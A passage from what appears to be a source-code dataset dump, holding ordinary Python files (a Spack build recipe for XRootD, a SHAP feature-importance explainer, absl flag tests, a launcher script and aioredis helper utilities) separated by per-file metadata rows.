    version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
    version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
    version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
    version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
    version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
    version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
    version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
    version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
    version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
    version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
    version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
    version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
    version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
    version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
    version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
    version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
    version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
    version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
    version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
    version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
    version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
    version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')

    variant('http', default=True,
            description='Build with HTTP support')
    variant('python', default=False,
            description='Build pyxroot Python extension')
    variant('readline', default=True,
            description='Use readline')
    variant('cxxstd',
            default='11',
            values=('98', '11', '14', '17'),
            multi=False,
            description='Use the specified C++ standard when building.')

    conflicts('cxxstd=98', when='@4.7.0:')

    depends_on('bzip2')
    depends_on('cmake@2.6:', type='build')
    depends_on('libxml2', when='+http')
    depends_on('uuid', when="@4.11.0:")
    depends_on('openssl')
    depends_on('python', when='+python')
    depends_on('readline', when='+readline')
    depends_on('xz')
    depends_on('zlib')

    extends('python', when='+python')
    patch('python-support.patch', level=1, when='@:4.8.99+python')

    def patch(self):
        """Remove the hardcoded -std=c++0x flag so the ``cxxstd`` variant
        (see setup_build_environment) is in sole control of the standard.
        """
        if self.spec.satisfies('@4.7.0:'):
            filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')

    def cmake_args(self):
        """Translate the spec's variants into CMake cache options."""
        spec = self.spec

        def on_off(name):
            # CMake-style boolean for whether a variant is enabled.
            return 'ON' if '+' + name in spec else 'OFF'

        options = [
            '-DENABLE_HTTP:BOOL=' + on_off('http'),
            '-DENABLE_PYTHON:BOOL=' + on_off('python'),
            '-DENABLE_READLINE:BOOL=' + on_off('readline'),
            '-DENABLE_CEPH:BOOL=OFF',
        ]
        # see https://github.com/spack/spack/pull/11581
        if '+python' in spec:
            options.append('-DPYTHON_EXECUTABLE=%s' %
                           spec['python'].command.path)
        return options

    def setup_build_environment(self, env):
        """Propagate the requested C++ standard to the build via CXXFLAGS."""
        value = self.spec.variants['cxxstd'].value
        # Each supported value maps onto a compiler attribute of the form
        # cxx<std>_flag (cxx98_flag, cxx11_flag, ...); this replaces the
        # previous copy-pasted if/elif ladder.
        cxxstdflag = getattr(self.compiler, 'cxx{0}_flag'.format(value), None)
        if cxxstdflag is None:
            # The user has selected a (new?) legal value that we've
            # forgotten to deal with here.
            # NOTE(review): ``tty`` is not imported explicitly in this file;
            # presumably provided by ``from spack import *`` -- verify.
            tty.die(
                "INTERNAL ERROR: cannot accommodate unexpected variant ",
                "cxxstd={0}".format(value))
        if cxxstdflag:
            env.append_flags('CXXFLAGS', cxxstdflag)
| 46.848214 | 112 | 0.684772 |
from spack import *
class Xrootd(CMakePackage):
homepage = "http://xrootd.org"
url = "http://xrootd.org/download/v5.0.1/xrootd-5.0.1.tar.gz"
version('5.0.1', sha256='ff4462b0b61db4cc01dda0e26abdd78e43649ee7ac5e90f7a05b74328ff5ac83')
version('4.12.3', sha256='6f2ca1accc8d49d605706bb556777c753860bf46d845b1ee11393a5cb5987f15', preferred=True)
version('4.12.2', sha256='29f7bc3ea51b9d5d310eabd177152245d4160223325933c67f938ed5120f67bb')
version('4.12.1', sha256='7350d9196a26d17719b839fd242849e3995692fda25f242e67ac6ec907218d13')
version('4.12.0', sha256='69ef4732256d9a88127de4bfdf96bbf73348e0c70ce1d756264871a0ffadd2fc')
version('4.11.3', sha256='8e7a64fd55dfb452b6d5f76a9a97c493593943227b377623a3032da9197c7f65')
version('4.11.2', sha256='4620824db97fcc37dc3dd26110da8e5c3aab1d8302e4921d4f32e83207060603')
version('4.10.0', sha256='f07f85e27d72e9e8ff124173c7b53619aed8fcd36f9d6234c33f8f7fd511995b')
version('4.8.5', sha256='42e4d2cc6f8b442135f09bcc12c7be38b1a0c623a005cb5e69ff3d27997bdf73')
version('4.8.4', sha256='f148d55b16525567c0f893edf9bb2975f7c09f87f0599463e19e1b456a9d95ba')
version('4.8.3', sha256='9cd30a343758b8f50aea4916fa7bd37de3c37c5b670fe059ae77a8b2bbabf299')
version('4.8.2', sha256='8f28ec53e799d4aa55bd0cc4ab278d9762e0e57ac40a4b02af7fc53dcd1bef39')
version('4.8.1', sha256='edee2673d941daf7a6e5c963d339d4a69b4db5c4b6f77b4548b3129b42198029')
version('4.8.0', sha256='0b59ada295341902ca01e9d23e29780fb8df99a6d2bd1c2d654e9bb70c877ad8')
version('4.7.1', sha256='90ddc7042f05667045b06e02c8d9c2064c55d9a26c02c50886254b8df85fc577')
version('4.7.0', sha256='6cc69d9a3694e8dcf2392e9c3b518bd2497a89b3a9f25ffaec62efa52170349b')
version('4.6.1', sha256='0261ce760e8788f85d68918d7702ae30ec677a8f331dae14adc979b4cc7badf5')
version('4.6.0', sha256='b50f7c64ed2a4aead987de3fdf6fce7ee082407ba9297b6851cd917db72edd1d')
version('4.5.0', sha256='27a8e4ef1e6bb6bfe076fef50afe474870edd198699d43359ef01de2f446c670')
version('4.4.1', sha256='3c295dbf750de086c04befc0d3c7045fd3976611c2e75987c1477baca37eb549')
version('4.4.0', sha256='f066e7488390c0bc50938d23f6582fb154466204209ca92681f0aa06340e77c8')
version('4.3.0', sha256='d34865772d975b5d58ad80bb05312bf49aaf124d5431e54dc8618c05a0870e3c')
variant('http', default=True,
description='Build with HTTP support')
variant('python', default=False,
description='Build pyxroot Python extension')
variant('readline', default=True,
description='Use readline')
variant('cxxstd',
default='11',
values=('98', '11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
conflicts('cxxstd=98', when='@4.7.0:')
depends_on('bzip2')
depends_on('cmake@2.6:', type='build')
depends_on('libxml2', when='+http')
depends_on('uuid', when="@4.11.0:")
depends_on('openssl')
depends_on('python', when='+python')
depends_on('readline', when='+readline')
depends_on('xz')
depends_on('zlib')
extends('python', when='+python')
patch('python-support.patch', level=1, when='@:4.8.99+python')
def patch(self):
if self.spec.satisfies('@4.7.0:'):
filter_file(r'\-std=c\+\+0x', r'', 'cmake/XRootDOSDefs.cmake')
def cmake_args(self):
spec = self.spec
options = [
'-DENABLE_HTTP:BOOL={0}'.
format('ON' if '+http' in spec else 'OFF'),
'-DENABLE_PYTHON:BOOL={0}'.
format('ON' if '+python' in spec else 'OFF'),
'-DENABLE_READLINE:BOOL={0}'.
format('ON' if '+readline' in spec else 'OFF'),
'-DENABLE_CEPH:BOOL=OFF'
]
if '+python' in self.spec:
options.append('-DPYTHON_EXECUTABLE=%s' %
spec['python'].command.path)
return options
def setup_build_environment(self, env):
cxxstdflag = ''
if self.spec.variants['cxxstd'].value == '98':
cxxstdflag = self.compiler.cxx98_flag
elif self.spec.variants['cxxstd'].value == '11':
cxxstdflag = self.compiler.cxx11_flag
elif self.spec.variants['cxxstd'].value == '14':
cxxstdflag = self.compiler.cxx14_flag
elif self.spec.variants['cxxstd'].value == '17':
cxxstdflag = self.compiler.cxx17_flag
else:
# forgotten to deal with here.
tty.die(
"INTERNAL ERROR: cannot accommodate unexpected variant ",
"cxxstd={0}".format(self.spec.variants['cxxstd'].value))
if cxxstdflag:
env.append_flags('CXXFLAGS', cxxstdflag)
| true | true |
f72ed67b5fe1b20f3cdf6654c9891e80bdd774e0 | 2,002 | py | Python | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | 2 | 2019-06-26T21:31:03.000Z | 2019-06-27T16:59:58.000Z | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | shapSD/feature_explainer/global_explainer.py | XiaoqiMa/shapSD | 545f61c9e8329c7271051f22f99ba32508ba74a1 | [
"MIT"
] | null | null | null | """
provide global explanation methods
author: Xiaoqi
date: 2019.10.29
"""
from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
    """Global (model-level) feature-influence explanations for a fitted
    black-box model, wrapping permutation importance, estimator weights
    and SHAP summaries behind a small facade.
    """

    def __init__(self, x_train, y_train, model):
        """
        Initialize a feature global explainer
        :param x_train: input data
        :param y_train: output data
        :param model: the underlying black-box model to be interpreted
        """
        self.x_train = x_train
        self.y_train = y_train
        self.model = model

    def _importance_calculator(self):
        # Single place that wires the training data into the importance
        # calculator shared by the methods below.
        return FeatureImportance(self.x_train, self.y_train, self.model)

    def permutation_importance(self, use_eli5=False):
        """
        Global variable influence measured by permutation importance
        :param use_eli5: bool, if True, use the ELI5 implementation, otherwise the raw implementation
        :return: feature importance ranking plot
        """
        calculator = self._importance_calculator()
        if use_eli5:
            return calculator.eli5_perm_importance()
        importance = calculator.permutation_importance()
        return calculator.vis_perm_importance(importance)

    def weights_importance(self):
        """
        Global variable influence measured by feature weights
        :return: an explanation of estimator parameters (weights)
        """
        return self._importance_calculator().eli5_weights_importance(
            show=['feature_importances', 'target', 'description'])

    def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
        """
        Global variable influence measured by SHAP feature importance (average
        absolute marginal effect of each feature)
        :return: a summary plot visualized using SHAP
        """
        explainer = ShapExplainer(self.x_train, self.model,
                                  explainer_type=explainer_type,
                                  background_sample=background_sample)
        return explainer.shap_summary_plot(plot_type='bar')
| 37.773585 | 105 | 0.676823 | from .feature_importance import *
from .shap_explainer import ShapExplainer
class GlobalExplainer(object):
def __init__(self, x_train, y_train, model):
self.x_train = x_train
self.y_train = y_train
self.model = model
def permutation_importance(self, use_eli5=False):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
if use_eli5:
return feature_imp.eli5_perm_importance()
else:
imp = feature_imp.permutation_importance()
return feature_imp.vis_perm_importance(imp)
def weights_importance(self):
feature_imp = FeatureImportance(self.x_train, self.y_train, self.model)
return feature_imp.eli5_weights_importance(show=['feature_importances', 'target', 'description'])
def shap_feature_importance(self, explainer_type='Tree', background_sample=500):
tree_shap = ShapExplainer(self.x_train, self.model, explainer_type=explainer_type,
background_sample=background_sample)
return tree_shap.shap_summary_plot(plot_type='bar')
| true | true |
f72ed6bd8cbd39180af1615ae392cf981ff63a32 | 4,411 | py | Python | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | absl/flags/tests/_flag_test.py | alexhagen/abseil-py | 240f85b0fa45acd95ca0157146245e7fb5453337 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Additional tests for Flag classes.
Most of the Flag classes are covered in the flags_test.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
  """Tests for _flag.Flag default-value handling."""

  def _make_flag(self, parser, name, default):
    # Small factory so each test case reads as data, not boilerplate.
    return _flag.Flag(
        parser, _argument_parser.ArgumentSerializer(), name, default, 'help')

  def setUp(self):
    self.flag = self._make_flag(
        _argument_parser.ArgumentParser(), 'fruit', 'apple')

  def test_default_unparsed(self):
    # default_unparsed preserves the default exactly as supplied, whether
    # it was given as a string or as an already-parsed value.
    flag = self._make_flag(_argument_parser.ArgumentParser(), 'fruit', 'apple')
    self.assertEqual('apple', flag.default_unparsed)

    flag = self._make_flag(_argument_parser.IntegerParser(), 'number', '1')
    self.assertEqual('1', flag.default_unparsed)

    flag = self._make_flag(_argument_parser.IntegerParser(), 'number', 1)
    self.assertEqual(1, flag.default_unparsed)

  def test_set_default_overrides_current_value(self):
    self.assertEqual('apple', self.flag.value)
    self.flag._set_default('orange')
    self.assertEqual('orange', self.flag.value)

  def test_set_default_overrides_current_value_when_not_using_default(self):
    # Once the flag no longer uses its default, changing the default must
    # leave the current value untouched.
    self.flag.using_default_value = False
    self.assertEqual('apple', self.flag.value)
    self.flag._set_default('orange')
    self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
  """Tests for BooleanFlag help text."""

  @parameterized.parameters(('', '(no help available)'),
                            ('Is my test brilliant?', 'Is my test brilliant?'))
  def test_help_text(self, helptext_input, helptext_output):
    # An empty help string is replaced with a placeholder.
    f = _flag.BooleanFlag('a_bool', False, helptext_input)
    self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
  """Tests for (string-valued) EnumFlag."""

  @parameterized.parameters(
      ('', '<apple|orange>: (no help available)'),
      ('Type of fruit.', '<apple|orange>: Type of fruit.'))
  def test_help_text(self, helptext_input, helptext_output):
    # Help text is prefixed with the set of allowed values.
    f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
    self.assertEqual(helptext_output, f.help)

  def test_empty_values(self):
    # An enum flag with no allowed values is rejected at construction.
    with self.assertRaises(ValueError):
      _flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
  """Sample two-member enum used by EnumClassFlagTest below."""
  APPLE = 1
  ORANGE = 2
class EmptyEnum(enum.Enum):
  """Enum with no members, used to test EnumClassFlag rejection."""
  pass
class EnumClassFlagTest(parameterized.TestCase):
  """Tests for EnumClassFlag (flags backed by an enum.Enum subclass)."""

  @parameterized.parameters(
      ('', '<APPLE|ORANGE>: (no help available)'),
      ('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
  def test_help_text(self, helptext_input, helptext_output):
    # Help text is prefixed with the enum's member names.
    f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
    self.assertEqual(helptext_output, f.help)

  def test_requires_enum(self):
    # A plain list of values is not accepted; an Enum subclass is required.
    with self.assertRaises(TypeError):
      _flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])

  def test_requires_non_empty_enum_class(self):
    with self.assertRaises(ValueError):
      _flag.EnumClassFlag('empty', None, 'help', EmptyEnum)

  def test_accepts_literal_default(self):
    f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
    self.assertEqual(Fruit.APPLE, f.value)

  def test_accepts_string_default(self):
    # A default given as the member's name string is parsed to the member.
    f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
    self.assertEqual(Fruit.ORANGE, f.value)

  def test_default_value_does_not_exist(self):
    with self.assertRaises(_exceptions.IllegalFlagValueError):
      _flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
# Allow running this test file directly.
if __name__ == '__main__':
  absltest.main()
| 32.674074 | 79 | 0.717751 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl._enum_module import enum
from absl.flags import _argument_parser
from absl.flags import _exceptions
from absl.flags import _flag
from absl.testing import absltest
from absl.testing import parameterized
class FlagTest(absltest.TestCase):
def setUp(self):
self.flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
def test_default_unparsed(self):
flag = _flag.Flag(
_argument_parser.ArgumentParser(),
_argument_parser.ArgumentSerializer(),
'fruit', 'apple', 'help')
self.assertEqual('apple', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', '1', 'help')
self.assertEqual('1', flag.default_unparsed)
flag = _flag.Flag(
_argument_parser.IntegerParser(),
_argument_parser.ArgumentSerializer(),
'number', 1, 'help')
self.assertEqual(1, flag.default_unparsed)
def test_set_default_overrides_current_value(self):
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('orange', self.flag.value)
def test_set_default_overrides_current_value_when_not_using_default(self):
self.flag.using_default_value = False
self.assertEqual('apple', self.flag.value)
self.flag._set_default('orange')
self.assertEqual('apple', self.flag.value)
class BooleanFlagTest(parameterized.TestCase):
@parameterized.parameters(('', '(no help available)'),
('Is my test brilliant?', 'Is my test brilliant?'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.BooleanFlag('a_bool', False, helptext_input)
self.assertEqual(helptext_output, f.help)
class EnumFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<apple|orange>: (no help available)'),
('Type of fruit.', '<apple|orange>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumFlag('fruit', 'apple', helptext_input, ['apple', 'orange'])
self.assertEqual(helptext_output, f.help)
def test_empty_values(self):
with self.assertRaises(ValueError):
_flag.EnumFlag('fruit', None, 'help', [])
class Fruit(enum.Enum):
APPLE = 1
ORANGE = 2
class EmptyEnum(enum.Enum):
pass
class EnumClassFlagTest(parameterized.TestCase):
@parameterized.parameters(
('', '<APPLE|ORANGE>: (no help available)'),
('Type of fruit.', '<APPLE|ORANGE>: Type of fruit.'))
def test_help_text(self, helptext_input, helptext_output):
f = _flag.EnumClassFlag('fruit', None, helptext_input, Fruit)
self.assertEqual(helptext_output, f.help)
def test_requires_enum(self):
with self.assertRaises(TypeError):
_flag.EnumClassFlag('fruit', None, 'help', ['apple', 'orange'])
def test_requires_non_empty_enum_class(self):
with self.assertRaises(ValueError):
_flag.EnumClassFlag('empty', None, 'help', EmptyEnum)
def test_accepts_literal_default(self):
f = _flag.EnumClassFlag('fruit', Fruit.APPLE, 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.APPLE, f.value)
def test_accepts_string_default(self):
f = _flag.EnumClassFlag('fruit', 'ORANGE', 'A sample enum flag.', Fruit)
self.assertEqual(Fruit.ORANGE, f.value)
def test_default_value_does_not_exist(self):
with self.assertRaises(_exceptions.IllegalFlagValueError):
_flag.EnumClassFlag('fruit', 'BANANA', 'help', Fruit)
if __name__ == '__main__':
absltest.main()
| true | true |
f72ed6f3f3b067f75edf1591df918110a3cd1d90 | 71 | py | Python | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-01-28T03:54:19.000Z | 2022-01-28T03:54:19.000Z | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | null | null | null | bin/run.py | Team-De-bug/Anti-Viral-Protocol | 6b8634432bfddda581aff6112a5b96fc1b9df5fd | [
"MIT"
] | 1 | 2022-02-17T19:57:45.000Z | 2022-02-17T19:57:45.000Z | #!/usr/bin/env python
from anti_viral_protocol import main
main.run()
| 14.2 | 36 | 0.774648 |
from anti_viral_protocol import main
main.run()
| true | true |
f72ed76a2412ba2f6fbe6587e6f523c5dadb2346 | 6,881 | py | Python | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | aioredis/util.py | tclarke/aioredis | d42dd9144ea376b8230786040972419b3ffab3c6 | [
"MIT"
] | null | null | null | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
# NOTE: never put here anything else;
# just this basic types
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
"""Encodes arguments into redis bulk-strings array.
Raises TypeError if any of args not of bytearray, bytes, float, int, or str
type.
"""
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration # noqa
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
"""Parse Redis connection URI.
Parse according to IANA specs:
* https://www.iana.org/assignments/uri-schemes/prov/redis
* https://www.iana.org/assignments/uri-schemes/prov/rediss
Also more rules applied:
* empty scheme is treated as unix socket path no further parsing is done.
* 'unix://' scheme is treated as unix socket path and parsed.
* Multiple query parameter values and blank values are considered error.
* DB number specified as path and as query parameter is considered error.
* Password specified in userinfo and as query parameter is
considered error.
"""
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'errors' in params:
options['errors'] = params['errors']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
class CloseEvent:
def __init__(self, on_close):
self._close_init = asyncio.Event()
self._close_done = asyncio.Event()
self._on_close = on_close
async def wait(self):
await self._close_init.wait()
await self._close_done.wait()
def is_set(self):
return self._close_done.is_set() or self._close_init.is_set()
def set(self):
if self._close_init.is_set():
return
task = asyncio.ensure_future(self._on_close())
task.add_done_callback(self._cleanup)
self._close_init.set()
def _cleanup(self, task):
self._on_close = None
self._close_done.set()
get_event_loop = getattr(asyncio, 'get_running_loop', asyncio.get_event_loop)
| 27.8583 | 79 | 0.608923 | import asyncio
import sys
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
IS_PY38 = sys.version_info >= (3, 8)
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args, buf=None):
if buf is None:
buf = bytearray()
buf.extend(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding, errors):
if errors is None:
errors = 'strict'
if isinstance(obj, bytes):
return obj.decode(encoding, errors)
elif isinstance(obj, list):
return [decode(o, encoding, errors) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
